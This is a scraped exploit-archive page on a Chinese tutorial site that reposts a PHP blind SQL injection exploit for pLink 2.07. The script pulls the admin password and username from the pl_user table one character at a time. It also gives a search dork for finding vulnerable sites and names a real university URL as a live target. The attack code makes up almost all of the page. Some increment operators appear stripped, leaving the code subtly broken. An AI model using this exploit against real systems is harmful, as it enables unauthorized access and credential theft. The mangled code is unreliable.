• linkedu视频
  • 平面设计
  • 电脑入门
  • 操作系统
  • 办公应用
  • 电脑硬件
  • 动画设计
  • 3D设计
  • 网页设计
  • CAD设计
  • 影音处理
  • 数据库
  • 程序设计
  • 认证考试
  • 信息管理
  • 信息安全
菜单
linkedu.com
  • 网页制作
  • 数据库
  • 程序设计
  • 操作系统
  • CMS教程
  • 游戏攻略
  • 脚本语言
  • 平面设计
  • 软件教程
  • 网络安全
  • 电脑知识
  • 服务器
  • 视频教程
  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链
您的位置:首页 > 网络安全 >Exploit > pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit

pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit

作者:佚名 字体:[增加 减小] 来源:互联网

佚名 向大家分享了pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit ,其中包含linkto,remote,remote是什么意思,remote control,remote mouse等知识点,遇到此问题的同学们可以参考下
<?php
ini_set("max_execution_time",0);
print_r('
###############################################################
#
# pLink 2.07 - Blind SQL Injection Exploit
#
# Vulnerability discovered by: Stack
# Exploit coded by: Stack
# Greetz to: All My Freind
#
###############################################################
#
# Dork: intext:"pLink 2.07"
# Admin Panel: [Target]/link/
# Usage: php '.$argv[0].' [Target] [Userid]
# Example for http://www.site.com/link/linkto.php?id=[Real id] 2
# => php '.$argv[0].' http://www.site.com/link/linkto.php?id=128 2
# Live Demo :
# http://www.uni-leipzig.de/fsrpowi/link/linkto.php?id=128 2
#
###############################################################
');
if ($argc > 1) {
$url = $argv[1];
if ($argc < 3) {
$userid = 1;
} else {
$userid = $argv[2];
}
$r = strlen(file_get_contents($url." and 1=1/*"));
echo "\nExploiting:\n";
$w = strlen(file_get_contents($url." and 1=0/*"));
$t = abs((100-($w/$r*100)));
echo "Password: ";
for ($j = 1; $j <= 32; $j ) {
for ($i = 46; $i <= 102; $i=$i 2) {
if ($i == 60) {
$i = 98;
}
$laenge = strlen(file_get_contents($url." and ascii(substring((select pwd from pl_user where id=".$userid." limit 0,1),".$j.",1))>".$i."/*"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$laenge = strlen(file_get_contents($url." and ascii(substring((select pwd from pl_user where id=".$userid." limit 0,1),".$j.",1))>".($i-1)."/*"));
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 102;
}
}
}
echo "\nUsername: ";
for ($i=1; $i <= 30; $i ) {
$laenge = strlen(file_get_contents($url." and ascii(substring((select username from pl_user where id=".$userid." limit 0,1),".$i.",1))!=0/*"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$count = $i;
$i = 30;
}
}
for ($j = 1; $j < $count; $j ) {
for ($i = 46; $i <= 122; $i=$i 2) {
if ($i == 60) {
$i = 98;
}
$laenge = strlen(file_get_contents($url." and ascii(substring((select username from pl_user where id=".$userid." limit 0,1),".$j.",1))>".$i."/*"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$laenge = strlen(file_get_contents($url." and ascii(substring((select username from pl_user where id=".$userid." limit 0,1),".$j.",1))>".($i-1)."/*"));
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 122;
}
}
}
} else {
echo "\nExploiting failed: By Stack\n";
}
?>

</div>

您可能想查找下面的文章:

  • pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit

相关文章

  • Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF PoC
  • DigiLeave 1.2 (info_book.asp book_id) Blind SQL Injection Exploit
  • Maian Events 2.0 Insecure Cookie Handling Vulnerability
  • NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta)
  • DESlock
  • webEdition CMS (we_objectID) Blind SQL Injection Exploit
  • Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit
  • Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)
  • MojoClassifieds 2.0 Remote Blind SQL Injection Exploit
  • MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit

文章分类

  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链

最近更新的内容

    • Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit
    • Maian Greetings 2.1 Insecure Cookie Handling Vulnerability
    • Dreampics Builder (page) Remote SQL Injection Vulnerability
    • Microsoft DNS Server (Dynamic DNS Updates) Remote Exploit
    • WarFTP 1.65 (USER) Remote Buffer Overlow Exploit
    • AlstraSoft Article Manager Pro 1.6 Blind SQL Injection Exploit
    • Linux Kernel
    • Belkin wireless G router ADSL2 modem Auth Bypass Exploit
    • MFORUM 0.1a Arbitrary Add-Admin Vulnerability
    • Facebook Newsroom CMS 0.5.0 Beta 1 Remote File Inclusion Vulnerability

关于我们 - 联系我们 - 免责声明 - 网站地图

©2020-2025 All Rights Reserved. linkedu.com 版权所有